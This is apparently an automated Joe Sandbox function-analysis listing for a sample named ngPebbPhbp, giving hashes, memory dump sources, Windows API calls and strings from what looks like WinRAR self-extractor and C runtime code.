                                                • Opcode Fuzzy Hash: 7ee31faf78791d89f12ddb336c7ff7af75c422707b794502e9e5e5257578801a
                                                • Instruction Fuzzy Hash: 3751F4325083E54FC711DF2884805AEBFE0AE9A314F8A49D9E0D55B243D331DB8ACB52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1961ae05fd848a4dc68f4d74e30573b1bb22f14ce586dc81f15194f66c7ce499
                                                • Instruction ID: 494f0fb4b93d7802a14ef4282fe9021f33f768ca2e48ae95f0201068c8820591
                                                • Opcode Fuzzy Hash: 1961ae05fd848a4dc68f4d74e30573b1bb22f14ce586dc81f15194f66c7ce499
                                                • Instruction Fuzzy Hash: C351CEB1A087119FC758CF29D48055AF7E1BB88314F058A2EE899E7740DB30E9598B96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                • Instruction ID: 4052bdfd87af1df4026a788e68a276d9570ce71dc18431b88c9932ab4d24f877
                                                • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                • Instruction Fuzzy Hash: 6C31EEB17047069FCB24DF28C8511AABFE0EB95300F504A6DE49AD3782C639E949CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                • Instruction ID: 900117b73895550de40b18299ac1fbb39649d80b8a876190a46ab8a811144472
                                                • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                • Instruction Fuzzy Hash: A141F470945B11CFC71ADF24D0959A6BBE0FF4A700B1249EFD06A8B261EB30EA44CB59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 1c5255d8da53e373dac47a38d847f1ba7ceb1a7740b46f34dda30f899deee7da
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: C9110B7724416143D614C63EF4B45FAA3D5EAC5320F6C42FAD15E4B6D8D222ED45950C
                                                APIs
                                                • _swprintf.LIBCMT ref: 00B13EEA
                                                  • Part of subcall function 00B0F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B0F6CD
                                                  • Part of subcall function 00B189ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00B4E088,?,00000007,00B133E2,?,?,00000050,5EA84158), ref: 00B18A0A
                                                • _strlen.LIBCMT ref: 00B13F0B
                                                • SetDlgItemTextW.USER32(?,00B4919C,?), ref: 00B13F64
                                                • GetWindowRect.USER32(?,?), ref: 00B13F9A
                                                • GetClientRect.USER32(?,?), ref: 00B13FA6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B14051
                                                • GetWindowRect.USER32(?,?), ref: 00B14081
                                                • SetWindowTextW.USER32(?,?), ref: 00B140B0
                                                • GetSystemMetrics.USER32(00000008), ref: 00B140B8
                                                • GetWindow.USER32(?,00000005), ref: 00B140C3
                                                • GetWindowRect.USER32(00000000,?), ref: 00B140F3
                                                • GetWindow.USER32(00000000,00000002), ref: 00B14165
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                • String ID: $%s:$CAPTION$d
                                                • API String ID: 2407758923-2512411981
                                                • Opcode ID: b880dc5cc7360aeba1126ef619f5c5d07a672473bf021f3944da971f84611242
                                                • Instruction ID: 9ec7a9ccd3f161a4fcd57328146813d0b0c987f116f7456042f8cb9e642c14d1
                                                • Opcode Fuzzy Hash: b880dc5cc7360aeba1126ef619f5c5d07a672473bf021f3944da971f84611242
                                                • Instruction Fuzzy Hash: B1819E72608301AFD714DF68CD89B6FBBE9EB88704F40095DFA85A3250DB34E949CB52
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00B560E0,00000FA0,?,?,00B26185), ref: 00B261B3
                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B26185), ref: 00B261BE
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B26185), ref: 00B261CF
                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B261E1
                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B261EF
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B26185), ref: 00B26212
                                                • DeleteCriticalSection.KERNEL32(00B560E0,00000007,?,?,00B26185), ref: 00B26235
                                                • CloseHandle.KERNEL32(00000000,?,?,00B26185), ref: 00B26245
                                                Strings
                                                • SleepConditionVariableCS, xrefs: 00B261DB
                                                • WakeAllConditionVariable, xrefs: 00B261E7
                                                • kernel32.dll, xrefs: 00B261CA
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B261B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 2565136772-3242537097
                                                • Opcode ID: 192cf6849e308178252aefb718df73b53dd8790c0bb689a8defe6be7f08bb890
                                                • Instruction ID: b293055e4328d195112bc978d20720ffb3537d2a7b1afa7f8963452bcaa4feb4
                                                • Opcode Fuzzy Hash: 192cf6849e308178252aefb718df73b53dd8790c0bb689a8defe6be7f08bb890
                                                • Instruction Fuzzy Hash: 36015E71A40761EBDA211BB5BC4DF5E3FE8EB44B52B644492F919E32A0EE64CC008B60
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00B33816
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B333CE
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B333E0
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B333F2
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33404
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33416
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33428
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B3343A
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B3344C
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B3345E
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33470
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33482
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B33494
                                                  • Part of subcall function 00B333B1: _free.LIBCMT ref: 00B334A6
                                                • _free.LIBCMT ref: 00B3380B
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B3382D
                                                • _free.LIBCMT ref: 00B33842
                                                • _free.LIBCMT ref: 00B3384D
                                                • _free.LIBCMT ref: 00B3386F
                                                • _free.LIBCMT ref: 00B33882
                                                • _free.LIBCMT ref: 00B33890
                                                • _free.LIBCMT ref: 00B3389B
                                                • _free.LIBCMT ref: 00B338D3
                                                • _free.LIBCMT ref: 00B338DA
                                                • _free.LIBCMT ref: 00B338F7
                                                • _free.LIBCMT ref: 00B3390F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: c4456d0fda648927c9a7c914457e8b0c2ad1a9832ac9679e97438dc090e0e08f
                                                • Instruction ID: 6209b181107ad36cd7dfcf5e185697dc2263f8ebd31d5e938a4cf89fd9300a3c
                                                • Opcode Fuzzy Hash: c4456d0fda648927c9a7c914457e8b0c2ad1a9832ac9679e97438dc090e0e08f
                                                • Instruction Fuzzy Hash: E7319E31A043049FEB20AA39E845B5BB3E8EF04B10F3444A9F459E7551DFB1EE88CB24
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1D919
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                • _wcslen.LIBCMT ref: 00B1D97B
                                                • _wcslen.LIBCMT ref: 00B1D99A
                                                • _wcslen.LIBCMT ref: 00B1D9B6
                                                • _strlen.LIBCMT ref: 00B1DA14
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,00B3D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00B1DA2D
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00B1DA54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                • API String ID: 1185167184-1533471033
                                                • Opcode ID: 2cf2b7ee217a3657506332238acd2d8669e5c561ab003da5e08e2925ff57b059
                                                • Instruction ID: defedcd3e9c284a621605f97e0ae0faf31a3fac64a5095a2035c60b521011919
                                                • Opcode Fuzzy Hash: 2cf2b7ee217a3657506332238acd2d8669e5c561ab003da5e08e2925ff57b059
                                                • Instruction Fuzzy Hash: 59518F71E11218AFEB04EBA0DC46BEEBBF9EF15310F540099E505BB191DB706E85CBA1
                                                APIs
                                                • GetWindow.USER32(?,00000005), ref: 00B237C4
                                                • GetClassNameW.USER32(00000000,?,00000080), ref: 00B237F0
                                                  • Part of subcall function 00B18DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B10E3F,?,?,?,00000046,00B11ECE,00000046,?,exe,00000046), ref: 00B18DBA
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B2380C
                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B23823
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B23837
                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B23860
                                                • DeleteObject.GDI32(00000000), ref: 00B23867
                                                • GetWindow.USER32(00000000,00000002), ref: 00B23870
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                • String ID: STATIC
                                                • API String ID: 3820355801-1882779555
                                                • Opcode ID: a744a068b85194a2c84be86910d7ce813a316228953d984c644215d18cec9539
                                                • Instruction ID: 48769d59e7b571fb858a7daccd67991ba83797dd2454587741e5272150e8a003
                                                • Opcode Fuzzy Hash: a744a068b85194a2c84be86910d7ce813a316228953d984c644215d18cec9539
                                                • Instruction Fuzzy Hash: 272137722847247BE220AB24BC4AFEF32DCEF45B11F0004A5FA15AB0D1DF349D4547A5
                                                APIs
                                                • _free.LIBCMT ref: 00B2FF25
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B2FF31
                                                • _free.LIBCMT ref: 00B2FF3C
                                                • _free.LIBCMT ref: 00B2FF47
                                                • _free.LIBCMT ref: 00B2FF52
                                                • _free.LIBCMT ref: 00B2FF5D
                                                • _free.LIBCMT ref: 00B2FF68
                                                • _free.LIBCMT ref: 00B2FF73
                                                • _free.LIBCMT ref: 00B2FF7E
                                                • _free.LIBCMT ref: 00B2FF8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 366ccf24b544c9e917a686055abe02356cd92341f6023f58dfa390e922a0808c
                                                • Instruction ID: c9d411833707f61372cb2a8c54f1665fa36488afb793b1ac3c2ca65575c700fc
                                                • Opcode Fuzzy Hash: 366ccf24b544c9e917a686055abe02356cd92341f6023f58dfa390e922a0808c
                                                • Instruction Fuzzy Hash: 3911A27652414CBFCF01FF94D952CDD7BB9EF08350F6140A1BA089B622DA71EA54DB84
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 322700389-393685449
                                                • Opcode ID: 74144ed59dc5e176097c529b3850c62c0e6a41efaa407ab16d859eee778ff2b4
                                                • Instruction ID: a5115697f93604c6e375f8c1b4c66d28444ff8972013ee46eeeed8f5c42ec891
                                                • Opcode Fuzzy Hash: 74144ed59dc5e176097c529b3850c62c0e6a41efaa407ab16d859eee778ff2b4
                                                • Instruction Fuzzy Hash: 2FB16875800229EFCF15EFA4E9819AEBBF5FF08310F1445AAE80C6B212D731DA51DB91
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0D99A
                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00B0D9BF
                                                • GetLongPathNameW.KERNEL32(?,?,?), ref: 00B0DA11
                                                • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00B0DA34
                                                • GetShortPathNameW.KERNEL32(?,?,?), ref: 00B0DA84
                                                • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00B0DC9F
                                                • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00B0DCEC
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                • String ID: rtmp
                                                • API String ID: 2388273531-870060881
                                                • Opcode ID: c61ca9b210c0a0a66f2e44d2fb913f76864d2f83c6d89c232da87ff477a1b5ef
                                                • Instruction ID: fc35128f88d7aa7366dbbf3dceda7e07e874b85eb003624e75e929322f00bf92
                                                • Opcode Fuzzy Hash: c61ca9b210c0a0a66f2e44d2fb913f76864d2f83c6d89c232da87ff477a1b5ef
                                                • Instruction Fuzzy Hash: C2B11470901258EACF24DBA8CC89BDDBBF9AF15305F5445E9E049B7291DB309B89CF60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3__wcslen
                                                • String ID: .rar$exe$rar$sfx
                                                • API String ID: 3251556500-630704357
                                                • Opcode ID: e581a54a7712980ad0fe6cc537131b824513734a03ff4710d17f34e2fe935c3f
                                                • Instruction ID: 991f3601621e8f0382636aabc66a9af271ec2f1ec5e553d9b1b4c191d9a70efa
                                                • Opcode Fuzzy Hash: e581a54a7712980ad0fe6cc537131b824513734a03ff4710d17f34e2fe935c3f
                                                • Instruction Fuzzy Hash: E971E431A01714DBCB21DFA8C985AEDB7F4EF48710FA00999F581AB291DB7199D2CB90
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00B104AB,00B104AD,00000000,00000000,5EA84158,00000001,00000000,00000000,?,00B1038C,?,00000004,00B104AB,ROOT\CIMV2), ref: 00B25459
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00B104AB,?,00000000,00000000,?,?,00B1038C,?,00000004,00B104AB), ref: 00B254D4
                                                • SysAllocString.OLEAUT32(00000000), ref: 00B254DF
                                                • _com_issue_error.COMSUPP ref: 00B25508
                                                • _com_issue_error.COMSUPP ref: 00B25512
                                                • GetLastError.KERNEL32(80070057,5EA84158,00000001,00000000,00000000,?,00B1038C,?,00000004,00B104AB,ROOT\CIMV2), ref: 00B25517
                                                • _com_issue_error.COMSUPP ref: 00B2552A
                                                • GetLastError.KERNEL32(00000000,?,00B1038C,?,00000004,00B104AB,ROOT\CIMV2), ref: 00B25540
                                                • _com_issue_error.COMSUPP ref: 00B25553
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                • String ID:
                                                • API String ID: 1353541977-0
                                                • Opcode ID: e7517944c7823e7e9ede845b2fb2acb51c90075b14eb1fcb00803143a925f07e
                                                • Instruction ID: a8f407b622e6cc989103632738f38b3fe1f7dd7dea46fbd435de91c3d93858ab
                                                • Opcode Fuzzy Hash: e7517944c7823e7e9ede845b2fb2acb51c90075b14eb1fcb00803143a925f07e
                                                • Instruction Fuzzy Hash: B541FA71A00625ABC720DFA8EC45BAEBBE9EF48710F2042A9F51DE7350DB35D94087A5
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B10470
                                                  • Part of subcall function 00B10360: __EH_prolog3.LIBCMT ref: 00B10367
                                                • VariantClear.OLEAUT32(?), ref: 00B105FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3$ClearVariant
                                                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                • API String ID: 4196654922-3505469590
